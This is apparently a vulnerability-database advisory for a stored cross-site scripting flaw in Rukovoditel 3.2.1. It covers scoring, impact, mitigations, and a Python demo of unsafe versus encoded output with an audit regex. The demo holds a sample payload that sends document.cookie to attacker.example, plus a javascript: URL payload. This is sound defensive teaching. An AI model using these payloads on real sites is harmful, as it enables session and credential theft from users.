
CVE-2022-43165: n/a in n/a

Medium
Tags: Vulnerability, CVE-2022-43165
Published: Fri Oct 28 2022 (10/28/2022, 00:00:00 UTC)
Source: CVE
Vendor/Project: n/a (the CVE record leaves this field empty; the description identifies the product as Rukovoditel)
Product: n/a (Rukovoditel v3.2.1 per the description)

Description

A stored cross-site scripting (XSS) vulnerability in the Global Variables feature (/index.php?module=global_vars/vars) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Value parameter after clicking "Create".

AI-Powered Analysis

AI analysis last updated: 07/05/2025, 03:41:29 UTC

Technical Analysis

CVE-2022-43165 is a stored cross-site scripting (XSS) vulnerability in the Global Variables feature of Rukovoditel version 3.2.1. Rukovoditel is a web-based project management and database application platform. The flaw sits in the /index.php?module=global_vars/vars endpoint: the 'Value' parameter submitted when a new global variable is created (the "Create" action named in the description) is stored without adequate sanitization and later written into HTML without output encoding. Any authenticated user who is permitted to create global variables can therefore persist a script or HTML payload; the payload executes in the browser of every user who subsequently views a page on which that variable is rendered. Because the script runs inside the victim's authenticated session, the consequences include session hijacking, credential theft, and actions performed in the victim's name within the application.

Note that clicking "Create" is the attacker's own submission step, not the user interaction counted by CVSS. The UI:R component reflects that a victim must load the page on which the stored value is displayed before the payload runs.

The CVSS 3.1 base score is 5.4 (medium). The components given for this record (network attack vector, low attack complexity, low privileges required, user interaction required, changed scope, low confidentiality and integrity impact, no availability impact) correspond to the vector AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N, the usual scoring for stored XSS. The scope is changed (S:C) because the vulnerable component is the server-side application while the impact lands in other users' browsers, i.e. in a different security authority. The weakness is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation). No public exploit and no vendor patch had been reported as of the publication date.

Potential Impact

For European organizations running Rukovoditel 3.2.1, this vulnerability poses a moderate risk. Exploitation requires an authenticated account with permission to create global variables, so the realistic threat actors are insiders and attackers who have already obtained valid user credentials. A successful attack executes arbitrary script in the sessions of other users who view the poisoned variable, enabling theft of session tokens, actions performed in the victim's name, and injection of further malicious content into the application. If an administrator views the stored payload, the attacker effectively inherits administrative control of the application; this is the main privilege-escalation path the flaw offers, and it stays within the application rather than giving direct access to the surrounding network. The data at risk is project management content, which may include confidential business information and personal data subject to GDPR, so both confidentiality and integrity are affected. Because a global variable is shared application-wide, a single injected value can reach users across several departments at once, disrupting workflows and causing reputational damage.

Mitigation Recommendations

Organizations should first confirm whether they are running Rukovoditel 3.2.1. Since no official patch was available at the time of writing, the following measures reduce exposure until one is published.

Restrict the ability to create or edit global variables to a small set of highly privileged, trusted accounts, or disable the Global Variables feature entirely if it is not needed.

The root-cause fix is output encoding, not input filtering: every stored 'Value' must be HTML-encoded at the point where it is written into the page (in PHP, htmlspecialchars() with ENT_QUOTES), regardless of any validation applied when the value was submitted. Input validation alone is insufficient because legitimate values may contain characters such as < and &, and because the encoding has to match the output context (text node versus attribute). Organizations that maintain their own copy of the code can apply this fix locally; everyone else should track vendor releases and apply the fix promptly once released, then verify it against the global_vars module named in the advisory.

Reduce the blast radius of any successful injection: set the HttpOnly flag on session cookies so a stored script cannot read them directly, and deploy a Content Security Policy that disallows inline scripts if the application functions under one.

Audit the already-stored global variables for values containing HTML markup or script, monitor web-server and application logs for requests to the global_vars module, and review user permissions regularly.

Educate users about the risks of XSS and enforce strong authentication, including multi-factor authentication, so that credential compromise, the prerequisite for exploitation, becomes harder.
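The following Python example is added here to make concrete both the rendering defect described in the Technical Analysis and the output-encoding fix and stored-value audit recommended above. It is not Rukovoditel's code (the project is written in PHP, and its source is not reproduced on this page); the table-row rendering, the attacker payload, the benign value and the row layout of the global-variable export are all constructed for illustration and labelled as such in the code.

```python
import html
import re

# Constructed sample payloads (hypothetical; the advisory publishes no PoC).
# The first is the kind of string an attacker would submit as a global
# variable "Value"; the second is a legitimate value that a naive input
# filter must not reject.
ATTACKER_VALUE = (
    '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">'
)
BENIGN_VALUE = "Acme & Co, 'Budget' 2022"


def render_unsafe(name, value):
    """Vulnerable pattern: the stored value is concatenated into the HTML
    table row exactly as the attacker submitted it, so any tag or event
    handler in it becomes live markup in the viewer's browser."""
    return f"<tr><td>{name}</td><td>{value}</td></tr>"


def render_safe(name, value):
    """Hardened pattern: HTML-encode every untrusted field at output time.
    quote=True also encodes ' and ", which matters if a value is ever placed
    inside an attribute rather than text content. This is the Python
    equivalent of PHP's htmlspecialchars($value, ENT_QUOTES, 'UTF-8')."""
    return (
        f"<tr><td>{html.escape(name, quote=True)}</td>"
        f"<td>{html.escape(value, quote=True)}</td></tr>"
    )


# Patterns indicating that a stored value carries active markup: an opening
# or closing tag, an inline event handler, or a javascript: URL. Meant for a
# one-off audit of values already in the store, not as an input filter.
SUSPICIOUS = re.compile(r"<\s*/?\s*[a-z!]|\bon[a-z]+\s*=|javascript\s*:", re.I)


def audit_global_vars(rows):
    """rows: iterable of (id, name, value) tuples as you would export them
    from the application's global-variable store (column layout assumed).
    Returns the ids of rows whose value contains markup worth reviewing."""
    return [row_id for row_id, _name, value in rows if SUSPICIOUS.search(value or "")]


# Constructed sample rows, as if exported from the affected store.
SAMPLE_ROWS = [
    (1, "company_name", BENIGN_VALUE),
    (2, "footer_note", ATTACKER_VALUE),
    (3, "banner", '<a href="javascript:alert(document.domain)">news</a>'),
    (4, "currency", "EUR"),
]


if __name__ == "__main__":
    print("vulnerable :", render_unsafe("footer_note", ATTACKER_VALUE))
    print("hardened   :", render_safe("footer_note", ATTACKER_VALUE))
    print("benign     :", render_safe("company_name", BENIGN_VALUE))
    print("flagged ids:", audit_global_vars(SAMPLE_ROWS))
```

Running the script shows the same stored value once as live markup and once neutralized into `&lt;img ... onerror=&quot;...`; the benign value survives encoding intact apart from `&amp;` and `&#x27;`, which is why encoding belongs at output rather than as a rejection rule on input. The audit function is deliberately noisy (it flags any tag-like text) because in a review of stored values a false positive costs a glance while a miss costs a session.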


Technical Details

Data Version
5.1
Assigner Short Name
mitre
Date Reserved
2022-10-17T00:00:00.000Z
CISA Enriched
true
Cvss Version
3.1
State
PUBLISHED

Threat ID: 682d9818c4522896dcbd7ec4

Added to database: 5/21/2025, 9:08:40 AM

Last enriched: 7/5/2025, 3:41:29 AM

Last updated: 7/31/2025, 2:04:34 AM
